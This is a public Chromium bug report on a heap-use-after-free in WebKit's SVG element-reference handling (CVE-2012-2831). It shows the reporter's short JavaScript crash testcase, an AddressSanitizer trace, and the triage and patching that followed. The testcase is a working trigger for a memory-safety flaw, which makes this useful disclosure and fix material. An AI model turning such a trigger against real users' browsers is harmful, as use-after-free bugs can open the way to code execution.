New issue
Advanced search Search tips
Starred by 1 user

Issue metadata

Status: Fixed
Closed: Dec 2012
EstimatedDays: ----
NextAction: ----
OS: All
Pri: 1
Type: Bug-Security

  • Only users with EditIssue permission may comment.

Sign in to add a comment

Issue 130356: Heap-use-after-free in WebCore::SVGDocumentExtensions::removeAllElementReferencesForTarget

Reported by, May 30 2012

Issue description

use-after-free in WebCore::SVGDocumentExtensions::removeAllElementReferencesForTarget

Chrome Version: dev

Chromium	21.0.1157.0 (Developer Build 139531)
OS	Linux
WebKit	537.1 (@118843)

Operating System: 64bit precise

      onload = function() {
        el0=document.createElementNS('', 'svg')


        el1=document.createElementNS('', 'svg')


        el2=document.createElementNS('', 'image')

        el3=document.createElementNS('', 'textPath')
        el3.setAttributeNS('', 'xlink:href', '#el1')

        el4=document.createElementNS('', 'use')
        el4.setAttributeNS('', 'xlink:href', '#el2')

        el2.setAttributeNS('', 'xlink:href', '#el0')
        window.getSelection().setBaseAndExtent(el1, 0, el1, 0)
        setTimeout("location.reload()", 10)

Type of crash: tab + asan
Crash State: 

==9219== ERROR: AddressSanitizer heap-use-after-free on address 0x7fffed156480 at pc 0x55555bb9c7b9 bp 0x7fffffff6230 sp 0x7fffffff6228
READ of size 8 at 0x7fffed156480 thread T0
    #0 0x55555bb9c7b9 in WebCore::SVGDocumentExtensions::removeAllElementReferencesForTarget(WebCore::SVGElement*) ???:0
    #1 0x55555bba923e in WebCore::SVGElement::removedFrom(WebCore::ContainerNode*) ???:0
    #2 0x55555bd42d90 in WebCore::SVGStyledElement::removedFrom(WebCore::ContainerNode*) ???:0

0x7fffed156480 is located 0 bytes inside of 392-byte region [0x7fffed156480,0x7fffed156608)
freed by thread T0 here:
    #0 0x55555e5cbd52 in operator delete(void*) ??:0
    #1 0x55555bbb3728 in WebCore::SVGElementInstance::detach() ???:0
    #2 0x55555bbb3246 in WebCore::SVGElementInstance::~SVGElementInstance() ???:0
    #3 0x55555bbb319e in WebCore::SVGElementInstance::~SVGElementInstance() ???:0
12.4 KB View Download
1.4 KB View Download

Comment 1 by, May 30 2012

Labels: WebKit-SVG

Comment 2 by, May 30 2012

Summary: Heap-use-after-free in WebCore::SVGDocumentExtensions::removeAllElementReferencesForTarget
Detailed report:


Crash Type: Heap-use-after-free READ 8
Crash Address: 0x7f9edf9b3c80
Crash State:
  - crash stack -
  - free stack -

Minimized Testcase (1.10 Kb):

Comment 3 by, May 30 2012

Labels: -Pri-0 -Area-Undefined Pri-1 Area-WebKit OS-All Mstone-21 SecImpacts-None Stability-AddressSanitizer SecSeverity-High
SVG team, please help to find the regresse

Comment 4 by, Jun 1 2012 looks like the most probable regresse

Comment 5 by, Jun 1 2012

Labels: ReleaseBlock-Stable
Status: Available
Thanks Philip. Can you please help to upstream this and poke Rob to fix the regression :)

Comment 6 by, Jun 1 2012

Labels: WebKit-ID-88144

Comment 7 by, Jun 5 2012

According to, which is the bug pdr believes is the root cause, the bug should be fixed. We now have that fix in our tree; I can't reproduce the crash on Mac dev or canary, but that doesn't necessarily mean it's really fixed. ClusterFuzz hasn't told us that we are happy yet, so maybe the bug persists?

I hate to be presumptuous, but I also hate to have a release-blocker with no owner, so I'm giving this to pdr. Maybe it'll turn out that you don't need to do anything. And if you're not the right person to take it, can you let us know who is best? Thanks! And, sorry. :)

Comment 8 by, Jun 5 2012

This bug is still present, you need to use an ASAN build to hit it though. Re-pinging rbuis to get this fixed, or I'll pick it up myself if he doesn't respond.

Comment 9 by, Jun 6 2012

I'm now on this bug.

Comment 10 by, Jun 12 2012

Small update: I haven't forgotten about this (it's my top issue).

Comment 11 by, Jun 14 2012

Patch up!

Comment 12 by, Jun 14 2012

@Abhishek, to get this in it needs to be in before tomorrow. Can you review this? Pinging Rob on IRC is not working and Niko is offline.

Comment 13 by, Jun 18 2012

Labels: Merge-Approved
Status: FixUnreleased Philip, does this need merging for m20 ? that function looked old, it might be that some new code just helped to trigger this.

Comment 14 by, Jun 18 2012

I think this does need merging. introduced the textPath regression, but is the real culprit which introduced this new resource handling model. There is almost certainly the same security bug in feImageElement.

Comment 15 by, Jun 18 2012

Labels: -Mstone-21 -SecImpacts-None Mstone-20 SecImpacts-Stable SecImpacts-Beta

Comment 16 by, Jun 19 2012

Labels: -Restrict-View-SecurityTeam -Merge-Approved Restrict-View-SecurityNotify Merge-Merged

Comment 17 by, Jun 19 2012

Labels: reward-topanel

Comment 18 by, Jun 19 2012

Just FYI: This bug also exposed some content model issues in SVG that schenney and I are working on in free time. For instance, you shouldn't be able to have:
to begin with.

Comment 20 by, Jun 22 2012

Labels: -reward-topanel reward-1000 reward-unpaid

Comment 21 by, Jun 25 2012

Labels: CVE-2012-2831

Comment 22 by, Jul 9 2012

Labels: -reward-unpaid

Comment 23 by, Oct 13 2012

Project Member
Labels: Restrict-AddIssueComment-Commit
This issue has been closed for some time. No one will pay attention to new comments.
If you are seeing this bug or have new data, please click New Issue to start a new bug.

Comment 24 by, Dec 20 2012

Status: Fixed

Comment 25 by, Jan 18 2013

Labels: Restrict-View-EditIssue

Comment 26 by, Mar 10 2013

Project Member
Labels: -Type-Security -Area-WebKit -WebKit-SVG -Mstone-20 -SecImpacts-Stable -Stability-AddressSanitizer -SecSeverity-High -SecImpacts-Beta Cr-Content M-20 Security-Impact-Stable Security-Impact-Beta Cr-Content-SVG Performance-Memory-AddressSanitizer Type-Bug-Security Security-Severity-High

Comment 27 by, Mar 14 2013

Project Member
Labels: -Restrict-AddIssueComment-Commit Restrict-AddIssueComment-EditIssue

Comment 28 by, Mar 21 2013

Labels: -Restrict-View-SecurityNotify -Restrict-View-EditIssue

Comment 29 by, Mar 21 2013

Project Member
Labels: -Security-Severity-High Security_Severity-High

Comment 30 by, Mar 21 2013

Project Member
Labels: -Security-Impact-Stable Security_Impact-Stable

Comment 31 by, Mar 21 2013

Project Member
Labels: -Security-Impact-Beta Security_Impact-Beta

Comment 32 by, Apr 1 2013

Project Member
Labels: -Performance-Memory-AddressSanitizer Stability-Memory-AddressSanitizer

Comment 33 by, Apr 6 2013

Project Member
Labels: -Cr-Content Cr-Blink

Comment 34 by, Apr 6 2013

Project Member
Labels: -Cr-Content-SVG Cr-Blink-SVG

Comment 35 by, Jun 14 2016

Project Member
Labels: -security_impact-beta

Comment 36 by, Oct 1 2016

Project Member
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit - Your friendly Sheriffbot

Comment 37 by, Oct 2 2016

Project Member
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit - Your friendly Sheriffbot

Comment 38 by, Oct 2 2016

Labels: allpublic

Comment 39 by, Apr 25 2018

Labels: CVE_description-submitted

Sign in to add a comment